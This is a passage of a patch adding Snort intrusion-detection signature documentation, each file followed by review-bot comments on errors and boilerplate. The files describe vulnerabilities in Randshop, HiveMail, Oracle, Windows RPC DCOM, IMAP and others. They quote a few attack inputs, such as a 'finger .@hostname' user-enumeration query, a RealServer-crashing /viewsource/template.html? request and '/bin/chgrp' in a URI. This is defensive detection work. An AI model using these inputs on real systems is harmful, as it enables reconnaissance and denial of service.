+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "incl" parameter in the "index.php" script used by the "Randshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Randshop
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
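Review bot: as in 100000584.txt, the third Detailed Information paragraph and the Attack Scenarios in 100000762.txt are authentication-bypass boilerplate ("supply his/her own credentials") that has nothing to do with a remote file include through the "incl" parameter of index.php; drop it and describe the actual RFI path, including that it depends on the PHP remote-include settings, and add disabling those settings to Corrective Action. "running ona web server" needs a space, the file starts with two stray blank lines, the blank line before the "--" after Sid is missing, and Affected Systems should name the Randshop versions.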
--- /dev/null
+++ b/doc/signatures/100000833.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000833
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "HiveMail" application running on a webserver. Access to the file "search.results.php" with SQL commands being passed as the "fields[]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "fields[]" parameter in the "search.results.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
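Review bot: for an SQL injection signature, the Corrective Action in 100000833.txt should go beyond "apply vendor patches" and say that the application must bind the "fields[]" values as query parameters, or strictly whitelist them if they are used as column names, rather than interpolating them into the SQL string. "the attacker may also be able to execute system binaries" only holds if the database account has such privileges, so qualify it. The third Detailed Information paragraph about "credentials of a client host" is the generic CGI boilerplate again and does not describe SQL injection; remove it. "running ona web server" needs a space, and the file starts with two stray blank lines.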
--- /dev/null
+++ b/doc/signatures/2504.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2504
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
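Review bot: "attcker" in Attack Scenarios should be "attacker". Additional References is empty although Detailed Information describes a specific Microsoft SSL library bug that Corrective Action says is fixed by "vendor supplied patches"; cite the Microsoft security bulletin and the CVE so an analyst can confirm patch state for the Windows 2000, 2003 and XP systems listed. Impact and Detailed Information are not separated by a blank line before "--", unlike the other sections.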
--- /dev/null
+++ b/doc/signatures/3148.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+3148
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Microsoft Windows Help.
+
+--
+Impact:
+Serious. Code execution is possible leading to unauthorized
+administrative access to the target host.
+
+--
+Detailed Information:
+Microsoft Windows Help can use ActiveX controls when dealing with
+Windows Help files.
+
+A programming error in the processing of a buffer that handles the
+"item" parameter of a help file can lead to the exposure of a buffer
+overflow condition. An attacker may be able to overflow this buffer and
+supply code of their choosing to be executed on the system with the
+privileges of the administrative account.
+
+In addition, applications may treat Windows Help as a trusted program
+and further exploitation and host firewall bypass may be possible.
+
+--
+Affected Systems:
+	Systems using Microsoft Windows
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting extra data into the input
+parameter of a malicious help file. The attacker may then insert code of
+their choosing to either run commands on the system or execute the code
+with the privileges of the administrative account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
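Review bot: Impact and Attack Scenarios in 3148.txt claim execution "with the privileges of the administrative account", but a Windows Help file is opened by a user and the injected code runs with that user's privileges; it is administrative only when the victim is an administrator, so say "privileges of the user opening the help file". "Affected Systems: Systems using Microsoft Windows" should list the affected Windows versions, and Additional References should cite the Microsoft bulletin for the Help "item" parameter overflow. Detailed Information also says the overflow is in "a buffer that handles the "item" parameter" without saying which ActiveX control exposes it; name it, since that is what an analyst would correlate the alert against.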
--- /dev/null
+++ b/doc/signatures/2599.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2599
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "add_grouped_column" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
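Review bot: the paragraph "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"" is rule-deployment guidance, not a description of the vulnerability, and it sits in Detailed Information; move it to False Negatives and state why it matters (on Windows the listener hands the client off to another port, so a rule pinned to the listener port never sees the procedure call). "in a Oracle database implementation" should be "in an Oracle database implementation", and Detailed Information should name the package that contains "add_grouped_column" the way 2827.txt names sys.dbms_repcat_mas, so the two Oracle replication documents are consistent. Attack Scenarios correctly notes that a valid login is required; "Ease of Attack: Simple." should reflect that prerequisite.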
--- /dev/null
+++ b/doc/signatures/3066.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3066
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"append" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
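Review bot: "associated with the several commands of an IMAP service" in the Summary should be "associated with several commands", and "An attacker can supplied an overly long command" in Attack Scenarios should be "can supply". The Summary says this sid covers the "append" command specifically while Detailed Information talks about "several commands" in general; say that the other commands are covered by separate sids so an analyst does not expect 3066 to fire for them. "Brian Caswell<bmc@sourcefire.com>" is missing a space, and Additional References is empty even though Affected Systems gives exact Mercury versions (3.32, 4.01a) that came from an advisory.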
--- /dev/null
+++ b/doc/signatures/583.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+583
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rstatd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rstatd is using.  Attackers can also learn what versions of the rstatd protocol are accepted by rstatd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rstatd run.  The rstatd RPC service can be queried for performance statistics obtained from the kernel including network, disk, and CPU.  This can provide valuable information to determine which host may make a suitable target to participate in a particular attack. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rstatd runs.  This may be a precursor to querying rstatd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rstatd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rstatd, not probes of the rstatd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rstatd service itself. An attacker may attempt to go directly to the rstatd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS10
+
+
+--
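Review bot: Style only: several lines in this file carry trailing whitespace (the Impact, Detailed Information, "Easy.  " and "Filter RPC ports" lines), and "Easy." is the one place in the patch where Ease of Attack is not phrased "Simple." Consider normalising so the files stay uniform when rendered or diffed.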
--- /dev/null
+++ b/doc/signatures/1521.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1521
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
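Review bot: The Summary and Detailed Information never say what this rule actually matches; "exploit a known vulnerability on a web server" is boilerplate that gives an analyst nothing to triage against. At minimum name the request element or application the signature keys on, and fill the empty Additional References. Minor: "the attackers choosing" wants an apostrophe ("attacker's"), and the Summary line ends in trailing whitespace.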
--- /dev/null
+++ b/doc/signatures/2763.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2763
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure do_deferred_repcat_admin
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
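Review bot: The sentence naming the vulnerable procedure is broken across lines: "vulnerability in the procedure do_deferred_repcat_admin" is followed by a line that starts with ". This procedure is included in", so the full stop is orphaned. Join it as "... the procedure do_deferred_repcat_admin. This procedure is included in dbms_repcat." Style: this file mixes "-- " separators with trailing spaces and plain "--", uses "None Known" where the other files use "None known.", and the Corrective Action line has no terminating period.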
--- /dev/null
+++ b/doc/signatures/1828.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1828
+
+--
+Summary:
+This event is generated when an attempt is made to use a known 
+vulnerability in the search functionality of certain web servers to view
+otherwise restricted files.
+
+--
+Impact:
+If successful, this attack will allow an attacker to view the contents 
+of any file on the server.
+
+--
+Detailed Information:
+The search engine in older versions of Netscape Enterprise Server and 
+its succesors uses HTML formatted pattern files to query users for 
+search paramters and return the results. The "NS-query-pat" command 
+allows clients to specify a pattern file other than the default. 
+Unfortunately, the search engine does not validate the filename 
+requested and allows clients to specify any file on the server, which is
+then displayed to the client.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.6 and earlier
+	iPlanet Web Server 4.1
+	iPlanet/Sun ONE Web Server 6.0 up to Service Pack 4
+	Netscape Enterprise Server 6.0
+
+--
+Attack Scenarios:
+An attacker could use this vulnerability to find user names and 
+passwords, SSL certificate files and related passwords, source code, or 
+just about any other information on the server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the search engine or procure a patch from your web server vendor.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+CVE
+CAN-2002-1042
+
+--
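Review bot: Two typos in Detailed Information: "succesors" should be "successors" and "search paramters" should be "search parameters". Several lines in this file also end in trailing whitespace. The CVE reference is present, which is good; the other files in this patch that describe a specific vulnerability should follow the same pattern.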
--- /dev/null
+++ b/doc/signatures/1010.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1010
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
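Review bot: As with 1521.txt, the description is generic: "Many known vulnerabilities exist for this platform and the attack scenarios are legion" does not tell the reader which IIS request this signature detects, so False Positives "None known." cannot really be assessed. Name the matched element, and fill the empty Additional References. Minor: "the attackers choosing" should be "the attacker's choosing".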
--- /dev/null
+++ b/doc/signatures/218.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+218
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "friday".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Solaris 2.5 operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
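Review bot: The Detailed Information line "This Trojan affects Solaris 2.5 operating systems:" ends in a colon with nothing following it, so either text was lost or the colon should be a period. This file also omits the Affected Systems section that every other file in the patch carries; the Solaris 2.5 statement belongs there. Minor: the Summary has a doubled space in "when  an attacker".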
--- /dev/null
+++ b/doc/signatures/3166.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3166
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
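Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match the Detailed Information, which describes malformed data sent to an RPC port; one of the two should be brought in line so the reader knows what traffic the rule sees. Typo: "Expoit code exists" should be "Exploit code exists". Note also that this file is word for word the same as 3234.txt later in this patch, with only the Sid differing; each should say what distinguishes the two rules.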
--- /dev/null
+++ b/doc/signatures/1337.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1337
+
+--
+Summary:
+Attempted chgrp command access via web
+
+--
+Impact:
+Attempt to change group permissions on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change file permissions on a machine. Using this
+command anattacker may change the permissions of a file to suit his
+own needs,make a file readable, writeable or excutable to other groups
+that wouldotherwise not have these special permissions.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chgrp'
+in the URIwhich can then change file permissions of files present on
+the host.Thiscommand may also be requested on a command line should
+the attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin.Whenever possible,
+sensitive filesand certain areas of the filesystem should have the
+system immutableflag set to negate the use of the chgrp command. On
+BSD derived systems,setting the systems runtime securelevel also
+prevents the securelevelfrom being changed. (note: the securelevel can
+only beincreased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1336
+sid: 1338
+
+man chgrp
+
+man chmod
+
+--
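Review bot: Many word boundaries were lost when this file was wrapped: "anattacker", "needs,make", "wouldotherwise", "URIwhich", "host.Thiscommand", "gainaccess", "it'sdesignated", "filesand", "immutableflag", "systems,setting", "securelevelfrom" and "beincreased" all need a space restored. In Corrective Action "it's" should be "its", and the sentence "setting the systems runtime securelevel also prevents the securelevel from being changed" is circular; the point is that a raised securelevel prevents the immutable flag from being cleared, which is what makes the flag effective. Minor: "excutable" should be "executable".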
--- /dev/null
+++ b/doc/signatures/1935.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command FOLD.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may include files of their
+choosing when supplying data to a POP server via the FOLD command.
+
+The FOLD command allows the user to specify a mail folder to select.  By
+specifying a very large argument, the user can exploit the buffer overflow
+condition.
+
+--
+Attack Scenarios:
+Simple. An attacker can supply specially crafted packets to a POP server
+via the FOLD function. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky Macatee <ricky.macatee@sourcefire.com>
+
+--
+Additional References:
+
+RFC 937:
+http://www.faqs.org/rfc/rfc937.txt
+
+--
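Review bot: The Sid in the file body is 1936 but the file is doc/signatures/1935.txt; one of the two is wrong and lookups keyed on the Sid will miss this document. The first Detailed Information paragraph ("an attacker may include files of their choosing") also contradicts the Summary and the second paragraph, which describe a buffer overflow in the FOLD argument; drop or correct it. Minor: trailing whitespace after "via the FOLD function."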
--- /dev/null
+++ b/doc/signatures/333.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+333
+
+--
+Summary:
+This event is generated when a remote user sends a finger request to .@hostname. This may indicate an attempt to discover information about users on the system.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Finger is a directory service on UNIX and Linux operating systems that allows users to obtain basic information about other users, including account name, home directory, and login status. A malicious user could use the string "finger .@hostname" to obtain a list of each user on the system. This may enable the attacker to view unused or inactive accounts, which are more likely to have default passwords that are relatively easy to guess or susceptible to brute force password attempts. 
+
+--
+Affected Systems:
+Any UNIX/Linux distribution with older versions of finger enabled.
+
+--
+Attack Scenarios:
+An attacker issues a finger .@host to the vulnerable server and views a list of users. The attacker then attempts to guess passwords for users with the "Never logged in" status.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A non-malicious user using finger to obtain a user list will cause this rule to trigger.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable finger support on your servers or upgrade to a more recent version of the finger daemon.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/793.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+793
+
+--
+Summary:
+This event is generated when an internal mail server sends an e-mail out of the network that may contain a Visual Basic Script (VBS) attachment. 
+
+--
+Impact:
+Malicious code infection.  This event may indicate that an internal host may be infected with some kind of malicious code.
+
+--
+Detailed Information:
+An outbound e-mail message that contains an attachment with a file name ending in ".vbs" may indicate that an internal host has been infected by some kind of malicious code.  A ".vbs" extension typically means that an attachment file is a Visual Basic Script.  A VBS attachment may contain executable code for a worm, virus, or trojan.
+
+--
+Affected Systems:
+Microsoft Windows hosts.
+
+--
+Attack Scenarios:
+Malicious code may be spread by e-mail containing attachments with files ending in ".vbs".
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This alert will be triggered if e-mail is sent containing a legitimate VBS attachment.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Make sure that the suspected infected host has the most current anti-virus software.
+
+Run a virus scan on the suspected infected host.
+
+Configure your mail server to block attachments that contain executable code, such as those with extensions of ".vbs", ".exe", etc.
+
+--
+Contributors:
+Original rule writer unknown.
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
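Review bot: Style only: missing space in the Contributors line "Steven Alexander<alexander.s@mccd.edu>", and the Summary line and the Impact line end in trailing whitespace. The Impact sentence "This event may indicate that an internal host may be infected" doubles "may"; "This event may indicate that an internal host is infected" reads better.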
--- /dev/null
+++ b/doc/signatures/277.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+277
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed request for a page on a RealNetworks RealServer port, which can indicate a Denial of Service (DoS) attack on the RealServer.
+
+--
+Impact:
+The RealNetworks RealServer service will crash.
+
+--
+Detailed Information:
+RealNetworks RealServer is a server application that serves streaming audio to clients. When an attacker sends a request for a template file in the /viewsource/ directory with an empty variable value, RealServer crashes.   
+
+--
+Affected Systems:
+Systems running RealNetworks RealServer 7.0 with View Source functionality enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request for /viewsource/template.html? on a RealServer audio server. RealServer crashes, stopping audio transmission.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user attempts to use the View Source function on the RealServer, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software or disable the View Source functionality. The vendor has issued an advisory, workarounds, and downloadable patches at http://service.real.com/help/faq/servgviewsrc.html.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RealNetworks
+http://service.real.com/help/faq/servgviewsrc.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/2252.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid:
+2252
+
+--
